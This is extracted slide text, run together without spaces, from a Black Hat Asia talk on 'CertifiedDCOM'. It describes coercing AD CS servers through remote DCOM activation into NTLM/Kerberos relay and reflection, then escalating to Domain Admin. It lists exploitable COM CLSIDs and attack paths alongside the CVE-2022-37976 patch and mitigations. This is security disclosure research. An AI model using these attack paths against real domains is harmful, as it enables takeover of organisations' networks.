1、#BHASIA BlackHatEventsCertifiedDCOMThePrivilegeEscalationJourneytoDomainAdminwithDCOMTianze Ding(D1iv3)Tencent Security Xuanwu Lab#BHASIA BlackHatEventsWhoamiTianze Ding(D1iv3)Senior Security Researcher,Tencent Security Xuanwu Lab Focusing on Active Directory Security/Cloud Security/Web Security 202

2、2 MSRC Most Valuable Researchers Black Hat/DEFCON/HITB Speaker#BHASIA BlackHatEventsAgenda COM/DCOM Basics Previous Research COM Attack Surface from Local to Remote CertifiedDCOM:Privilege Escalation to Domain Admin Patches&Mitigations Conclusions&Takeaways#BHASIA BlackHatEventsWhat is COM?Component

3、 Object Model(COM)COM is everywhere,OLE,ActiveX,DirectX,Windows Runtime,WMI,etc.COM ServerCOM ObjectQueryInterfaceAddRefReleaseMethod AMethod BCOM Interface COM ServerDLL/EXE files with one or more COM classes COM ObjectAn instance of a COM class which implements one or more interfaces COM Interface

4、A set of methods that can be invoked by clientsInterface AIUnknown#BHASIA BlackHatEventsCOM/DCOMCOM Server In-Process Server Runs in the same process of the client Out-of-Process Server Runs in a separate process Interact through ALPC Remote Server(DCOM)Runs in a remote computer Interact through RPC

5、Client ProcessCOM ProxyApplicationCodeCOM ServerCOM StubCOM ObjectALPC/RPCout-of-process server/remote server#BHASIA BlackHatEventsOut-of-process COMClientCOM ServerRPCSS1.Request COM Object2.Create new process andnew COM objectLaunch and Activation3.Register&Activation info4.Activation infoAccess5.

6、Access COM interfaces and methodsthrough ALPCe.g.,CoCreateInstance#BHASIA BlackHatEventsDCOMClientCOM ServerRPCSSRPCSSComputer AComputer B3.Launch and Activation4.Access through RPC2.Request COM Object1.Request COM Objecte.g.,CoCreateInstancePort 13DynamicPort#BHASIA BlackHatEventsPotato Attacks and

7、 Kerberos RelayRotten PotatoJuicy PotatoRogue PotatoRemote PotatoLocal PotatoKerberos RelayThe beginning of the story:CoGetInstanceFromIStorageService Account to SYSTEM LPEDomain User to SYSTEM/Other Local Sessions LPELocal User to SYSTEM LPEMS15-076Local User to SYSTEM LPEPotato attacks and Kerbero

8、s Relay abuse COM activation for LPERemote attack surface?#BHASIA BlackHatEventsHRESULT CoGetInstanceFromIStorage(in,optional COSERVERINFO*pServerInfo,in,optional CLSID*pClsid,in,optional IUnknown*punkOuter,in DWORD dwClsCtx,in IStorage*pstg,in DWORD dwCount,in,out MULTI_QI*pResults);CoGetInstanceFr

9、omIStorageCoGetClassObjectCoCreateInstance(Ex)CoCreateInstanceFromAppCoGetInstanceFromFileCoGetInstanceFromIStorageWindows APIs to create COM objectsCreate a new COM object and initializes it from a storage objectThe pstg parameter is an interface pointerto the storage object#BHASIA BlackHatEventsCO

10、M Marshaling/UnmarshalingEvilStroage*pstgInterface pointers must be marshalled into OBJREF structures in crossing apartment/process/computer communication.IStorageIMarshalOBJREF_CUSTOMmarshalGetUnmarshalClassMarshalInterfaceOBJREF_CUSTOMunmarshal Create object and getinterface pointerMEOWOBJREF Type

11、IIDCLSIDcbExtensionData SizeDataCOM ClientCOM ServerOBJREF_CUSTOM#BHASIA BlackHatEventsCOM Marshaling/UnmarshalingEvilStroage*pstgIStorageIMarshalOBJREF_CUSTOMmarshalGetUnmarshalClassMarshalInterfacePointerMoniker:UnmarshalInterfaceunmarshalUnmarshal OBJREF_STANDARDPointerMonikerOBJREF_STANDARDOBJRE

12、F_CUSTOMCOM ClientCOM ServerMEOWOBJREF TypeIIDFlagscPublicRefsOXID(Object Explorer ID)OIDIPIDStringBindingsSecurityBindingsOBJREF_STANDARD#BHASIA BlackHatEventsCOM Marshaling/UnmarshalingStringBindingSecurityBindingTowerIdNetworkAddressAuthnSvcReservedService Principal NameUnmarshal OBJREF_STANDARDC

13、OM ServerRPCSS ResolveOxid2Initiate an RPC connection to the address specified in the StringBinding#BHASIA BlackHatEventsCoGetInstanceFromIStorageHigh-privilegedCOM ServerCoGetInstanceFromIStorage(,Clsid,EvilStorage,)Launch and ActivationUnmarshal OBJREFAttackersRogue ServerResolveOxid2 over RPCOxid

14、Bindings(StringBindings and SecurityBindings)A new COM connection to the address in OxidBindingsImpersonate the high-privileged user running theCOM serverRelay NTLM/Kerberosauthentication toother servicesAttackers COM ClientPrevious research Attackers COM client and the victim COM serverare on the s

15、ame machine Impersonate/Relay identities of high-privilegedCOM Servers for LPEBoth connections require authenticationRPCSS#BHASIA BlackHatEventsRemote CoGetInstanceFromIStoragetypedef struct _COSERVERINFO DWORD dwReserved1;LPWSTR pwszName;COAUTHINFO*pAuthInfo;DWORD dwReserved2;COSERVERINFO;Can we us

16、e CoGetInstanceFromIStorage to coerce a remote computer connect to us over RPC/DCOM andexploit it for a NTLM/Kerberos Relay attack?HRESULT CoGetInstanceFromIStorage(in,optional COSERVERINFO*pServerInfo,in,optional CLSID*pClsid,in,optional IUnknown*punkOuter,in DWORD dwClsCtx,in IStorage*pstg,in DWOR

17、D dwCount,in,out MULTI_QI*pResults);Remote Computer NameRemote Auth InfoCoGetInstanceFromIStorage also supports remote COM activationtypedef enum tagCLSCTX CLSCTX_REMOTE_SERVERRemote Activation#BHASIA BlackHatEventsRemote CoGetInstanceFromIStorageSuppose an attacker has Domain User/Domain Computer p

18、rivilegesUse CoGetInstanceFromIStorage to activate a COM object on a remote domain computerAccess is Denied#BHASIA BlackHatEventsCOM SecurityCOM ClientCOM ServerSystem-wide ACLProcess-wide ACLCOM Launch/Activation/Access System-wide Launch and Activation LimitsDefined in HKEY_LOCAL_MACHINESOFTWAREMi

19、crosoftOleBy default,only users in specify high-privileged local groups are allowedto perform Remote Launch and Remote Activation#BHASIA BlackHatEventsRemote Attack Surface?Low-privileged accounts(e.g.,Domain Users,Domain Computers)are not allowed to activate any COM object on a remote computer in W

20、indows defaultCOM security configurationWhere is the remote attack surface?#BHASIA BlackHatEventsRemote Attack Surface in Active Directory18Windows Windows default COM Security configuration Preinstalled COM classes in WindowsActive Directory Widely used services in Active Directory COM classes intr

21、oduced by these services Special COM security configuration introduced bythese services#BHASIA BlackHatEventsSpecial COM Security ConfigurationRDS(Remote Desktop Service)Widely used by enterprise virtual application/desktop solutions,e.g.,Citrix,VMware HorizonRDS Remote Access Servers,RDS Endpoint S

22、ervers and RDS Management Servers haveRemote Launch and Remote Activation privileges.In the RDS default configuration,no low-privilege domain accounts in these groups.#BHASIA BlackHatEventsSpecial COM Security ConfigurationSCCM(System Center Configuration Manager)SMS Admins group has Remote Launch a

23、nd Remote Activation privileges.By default,each administrative user in a hierarchy and the site server computer account are members of the SMS Admins group.No low-privilege domain accounts in the SMS Admins group.#BHASIA BlackHatEventsSpecial COM Security ConfigurationAD CS(Active Directory Certific

24、ate Service)Certificate Service DCOM Access group has Remote Activation privilegeThe Authenticated Users group is in the Certificate Service DCOM Access groupBy default,any domain account can pass the system-wide ACL check and areallowed to activate COM objects remotely on ADCS#BHASIA BlackHatEvents

25、Special COM Security ConfigurationAD CS(Active Directory Certificate Service)https:/posts.specterops.io/certified-pre-owned-d95910965cd2Certificate Signing Request(CSR)Protocol MS-WCCE(DCOM)MS-ICPR(MS-RPC)HTTPThe special configuration is for MS-WCCE toallow any domain account to send a CSR to AD CS

26、with DCOM#BHASIA BlackHatEventsFind Exploitable COM Classes on ADCSProcess-wide Security Process-wide ACL Identity Authentication Level Impersonation Level Registry Defined inHKEY_CLASSES_ROOTAppIDAppID_GUID CoInitializeSecurity API COM server can call it explicitly to override the configuration in

27、the registry#BHASIA BlackHatEventsFind Exploitable COM Classes on ADCSWhat kind of exploitable COM do we need?COM servers that are already launched Certificate Service DCOM Access group does not have Remote Launch privilege in the ADCS system-wide ACL Process-wide ACL allows remote activation by low

28、-privileged domain accountsProcess-wide ACL for Launch/Activation/Access Defined in the LaunchPermission and AccessPermissionregistry values#BHASIA BlackHatEventsFind Exploitable COM Classes on ADCSIdentity Defined in the RunAs registry value The user identity the COM server runs asWhat kind of expl

29、oitable COM do we need?COM servers with the identity set to any user can performnetwork authentication except Local Service,which use the anonymous user for networkauthenticationThe Interactive user Use the user that is currently logged on to the computer forauthenticationThe system account Use the

30、domain computer account for authentication#BHASIA BlackHatEventsFind Exploitable COM Classes on ADCSWhat kind of exploitable COM do we need?Authentication Level Defined in the AuthenticationLevel registry value The default value is RPC_C_AUTHN_LEVEL_CONNECT,whichmeans no signing and sealing in DCOM

31、connectionsImpersonation Level The default value is RPC_C_IMP_LEVEL_IDENTIFY,whichmeans the server cannot impersonate the clientTarget of Relay AttackAuthentication LevelImpersonation LevelLDAP/LDAPSRPC_C_AUTHN_LEVEL_CONNECT=RPC_C_IMP_LEVEL_IDENTIFYSMB=RPC_C_AUTHN_LEVEL_CONNECTRPC_C_IMP_LEVEL_IMPERS

32、ONATEADCS HTTP(S)=RPC_C_AUTHN_LEVEL_CONNECTRPC_C_IMP_LEVEL_IMPERSONATEADCS MS-ICPR=RPC_C_AUTHN_LEVEL_CONNECTRPC_C_IMP_LEVEL_IMPERSONATE#BHASIA BlackHatEventsExploitable COM Classes on ADCSNameCLSIDIdentityAuthentication LevelImpersonation LevelCertSrv Requestd99e6e74-fc88-11d0-b498-00a0c90312f3SYSTE

33、MCONNECTIDENTIFYCertSrv Admind99e6e73-fc88-11d0-b498-00a0c90312f3SYSTEMCONNECTIDENTIFYOCSPRequestD3ab092c4-de6a-4dc4-be9e-fdacbb05759cSYSTEMCONNECTIDENTIFYOCSPAdminD6d5ad135-1730-4f19-a4eb-3f78e7c976bbSYSTEMCONNECTIDENTIFYOCSPRequestD and OCSPAdminDintroduced by the ADCS Online Responder roleCertSrv

34、 Request and CertSrv Admininstalled in ADCS by default for MS-WCCEExploitable COM classes on ADCSRelay ADCS$s authentication messages to LDAP(S)Use the ADCS$computer accountfor network authentication#BHASIA BlackHatEventsDCOM with ADCS$s NTLM/Kerberosauthentication messagesAttackerADCSOxidBindingsNT

35、LM Relay/Remote Kerberos RelayRemote CoGetInstanceFromIStorageResolveOxid2 over MS-RPCAn attacker can use CoGetInstanceFromIStorage toactivate an exploitable COM object on ADCS remotelySecurityBinding AuthnSvc can be set to NTLM/Kerberos PrincName can be set to any SPNOxidBindings#BHASIA BlackHatEve

36、ntsDCOM with ADCS$s NTLM/Kerberosauthentication messagesAttackerADCSDomain ControllerRelaying NTLM/Kerberos to LDAP(S)RBCD/ShadowCredentails attackNTLM Relay/Remote Kerberos RelayThe authentication in this DCOM connection will adhere to the process-wide securityconfigurations of the exploitable COMT

37、he attacker can then relay ADCS$s authentication messages to LDAP(S)toperform RBCD/ShadowCredentials attack#BHASIA BlackHatEventsDCOM with ADCS$s NTLM/Kerberosauthentication messagesAttackerADCSDomain ControllerOxidBindingsRelaying NTLM/Kerberos to LDAP(S)RBCD/ShadowCredentails attackNTLM Relay/Remo

38、te Kerberos RelayRemote CoGetInstanceFromIStorageResolveOxid2 over MS-RPC#BHASIA BlackHatEventsPrivilege Escalation to Domain AdminAttack Path#1Use S4U2Self/S4U2Proxy to request a domain admins ST to access the ADCSRCE on the ADCS with PSEXEC,WMIEXEC,WINRM to dump the private keyEscalate to Domain A

39、dmin with the Golden Certificate attackAttack Path#2Use S4U2Self/S4U2Proxy to request a domain admins ST to access the ADCSUse the domain admins ST to request a certificate with MS-WCCE/MS-ICPR/Use the domain admins certificate to request a TGT with PKINITEscalate to Domain Admin with the TGT#BHASIA

40、 BlackHatEventsDemohttps:/youtu.be/OHwjeGUSM4w#BHASIA BlackHatEventsPatch and MitigationPatch-CVE-2022-37976Released on October 11,2022The patch raised the authentication level to RPC_C_AUTHN_LEVEL_PKT_PRIVACY in theCertificate Service.DCOM Authentication HardeningReleased on November 8,2022The upda

41、te automatically raised authentication level for all non-anonymous activation requests from DCOM clients to RPC_C_AUTHN_LEVEL_PKT_INTEGRITY if its below Packet Integrity.Enable Protection for Relay Attacks LDAP Signing and Channel Binding#BHASIA BlackHatEventsCan We Relay to Other Services?Relaying

42、to ADCS HTTP(S)/SMB/MS-ICPR requires the impersonation level ofauthentication set to RPC_C_IMP_LEVEL_IMPERSONATENo remotely activatable COM class on ADCS satisfies this requirementCan we relay the authentication in the ResolveOxid2 RPC connection?AttackerADCSRemote CoGetInstanceFromIStorageResolveOx

43、id2 over MS-RPC#BHASIA BlackHatEventsCan We Relay to Other Services?rpcss.dll!ResolveClientOXIDThe impersonation level of the ResolveOxid2 RPC authentication is RPC_C_IMP_LEVEL_IMPERSONATENTLM Relay We can relay ADCS$s NTLM authentication messages in the ResolveOxid2 RPC toanother ADCS Servers HTTP/

44、MS-ICPR(without IF_ENFORCEENCRYPTICERTREQUEST flag)Requires two ADCS server in the domain,because we cant relay NTLM back to the same machine#BHASIA BlackHatEventsKerberos Relay?The SPN in the ResolveOxid2 RPC authentication is forced to RPCSS/MachineNameFromStringBindingKerberos Relay Unable to tri

45、gger Kerberos Relay with the SecurityBindingSecurityBindingAuthnSvcReservedService Principal Namerpcss.dll!ResolveClientOXIDCan we set arbitrary SPN in the forgedOBJREFs SecurityBinding?#BHASIA BlackHatEventsRPC Protocol SequenceStringBindingTowerIdNetworkAddressRPC sequence type identifies the prot

46、ocol to be used in RPC callsTower IdRPC Transport0 x04ncacn_dnet_nsp0 x07ncacn_ip_tcp0 x08ncadg_ip_udp0 x09ncacn_nb_tcp0 x0Cncacn_spx0 x0Dncacn_nb_ipx0 x0Encadg_ipx0 x0Fncacn_np0 x10ncalrpc0 x13ncacn_nb_nb0 x16ncacn_at_dsp0 x17ncadg_at_ddp0 x1Ancacn_vns_spp0 x1Dncadg_mq0 x1Fncacn_http0 x21ncacn_hvso

47、cketTCP,UDP,SMB,NetBIOS,HTTP,MQ Can these protocols be abused for NTLM/Kerberos Relay?#BHASIA BlackHatEventsRPC Protocol SequenceRPCDCOM ConnectionAttackerADCSOxidBindingsRemote CoGetInstanceFromIStorageResolveOxid2 over MS-RPC ncacn_ip_tcp ncacn_http ncacn_ip_tcp ncacn_http ncacn_np#BHASIA BlackHat

48、EventsRPC over HTTP(ncacn_http)Support both RPC over HTTP v1 and RPC over HTTP v2Use the RPC over HTTP v2 first;if that fails,the client will fall back to the RPC over HTTP v1RPC over HTTP v1ClientServerHTTP RPC_CONNETRaw RPC PacketHTTP/1.1 200 OKRPC bindRPC bind_ack.No auth in HTTP layerAuthenticat

49、ion messages in the RPC packet#BHASIA BlackHatEventsRPC over HTTP(ncacn_http)RPCRPC over HTTP v2:RPC_IN_DATAclientserverHTTP RPC_IN_DATARaw RPC PacketHTTP/1.1 200 SuccessRPC RTS PacketRPC bindNo auth in HTTP layerRPC over HTTP v2RPCclientserverHTTP RPC_OUT_DATAHTTP/1.1 200 SuccessRPC RTS Packet.RPC

50、bind_ack.RPC over HTTP v2:RPC_OUT_DATAAuthentication messages in RPC packets#BHASIA BlackHatEventsRPC over HTTP(ncacn_http)RPC over HTTP(ncacn_http)RPCNo authentication in the HTTP layerThe RPC authentication in ncacn_http works the same as it is in ncacn_ip_tcpNTLM Relay/Kerberos RelayWe can perfor

51、m NTLM Relay/Kerberos Relay with RPC packets in HTTPconnections the same as RPC over ncacn_ip_tcpRPC over HTTP traffic may bypass some network restrictions or NDR devices#BHASIA BlackHatEventsRPC over Named Pipe(ncacn_np)RPCThe DCOM connection also support RPC over Named Pipe(ncacn_np)The ncacn_np u

52、ses the identity of RPCSS(NETWORK SERVICE)for networkauthentication in the SMB layerThe ADCS machine account#BHASIA BlackHatEventsRPC over Named Pipe(ncacn_np)RPCThe impersonation level of the authentication is SECURITY_IMPERSONATION,whichmeans the client can be impersonated by the server.NTLM Relay

53、 We can relay ADCS$s NTLM authentication messages in the SMB to another ADCSServers HTTP/MS-ICPR(without IF_ENFORCEENCRYPTICERTREQUEST flag)Requires two ADCS server in the domainKerberos Relay The SPN in the authentication is forced to be CIFS/MachineNameFromStringBinding Unable to trigger Kerberos

54、Relay#BHASIA BlackHatEventsCVE-2022-37976Patch Analysiscertsrv.exe before patchcertsrv.exe after patch#BHASIA BlackHatEventsCVE-2022-37976Patch AnalysisMainWndProcInitializeComSecurityCoInitializeSecurityAuthentication Level is set toRPC_C_AUTHN_LEVEL_PKT_PRIVACYImpersonation Level is set toRPC_C_IM

55、P_LEVEL_IMPERSONATEThis function is introduced by the patch#BHASIA BlackHatEventsKerberos ReflectionThe patch for CVE-2022-37976 changed the impersonation level of the Certificate Service(CertSrv Request and CertSrv Admin)to RPC_C_IMP_LEVEL_IMPERSONATENTLM RelayKerberos ReflectionWith the patch,we c

56、an relay DCOM to ADCS HTTP/MS-ICPR running on a different machineKerberos Reflection is not restricted,we can relay Kerberos back to the same ADCS server#BHASIA BlackHatEventsKerberos ReflectionDCOM with ADCS$s Kerberos AP-REQ messagesAttackerADCSRelaying Kerberos AP-REQ to ADCS HTTPRemote CoGetInst

57、anceFromIStorage with theCertSrv Request COMResolveOxid2 over MS-RPCStringBinding:attackers machineSecurityBinding:http/adcs.domain.localOxidBindingsRequest a certificate of ADCS$ncacn_ip_tcporncacn_http#BHASIA BlackHatEventsMitigationsADCS HTTP EndpointsFollow Microsofts guide to enable EPA(Extende

58、d Protection for Authentication)onyour ADCS HTTP endpointsEPA can protect your ADCS HTTP endpoints from both NTLM Relay and Kerberos RelayMS-ICPRKeep the default settings of the MS-ICPR,dont remove the IF_ENFORCEENCRYPTICERTREQUEST flag#BHASIA BlackHatEventsBlack Hat Sounds BytesCertifiedDCOMA remot

59、e attack surface of DCOM and AD CSPrivilege escalation from Domain Users to Domain AdminTake Kerberos Relay to the next level,make it a remote attack vectorAttacks may also work against customized DCOM with misconfigurationsMitigationsUpdate your AD CS to install the patch for CVE-2022-37976Update a

60、ll your machines to enable DCOM Authentication HardeningEnable LDAP Signing and Channel Binding&Enable EPA for ADCS HTTPCheck your customized system-wide and process-wide COM security configurations#BHASIA BlackHatEventsAcknowledgments James Forshaw(tiraniddo)Andrea Pierini(decoder_it)Antonio Cocomazzi(splinter_code)cube0 x0Standing on the shoulders of giants!#BHASIA BlackHatEventsThank You!Tianze Ding(D1iv3)Tencent Security Xuanwu Lab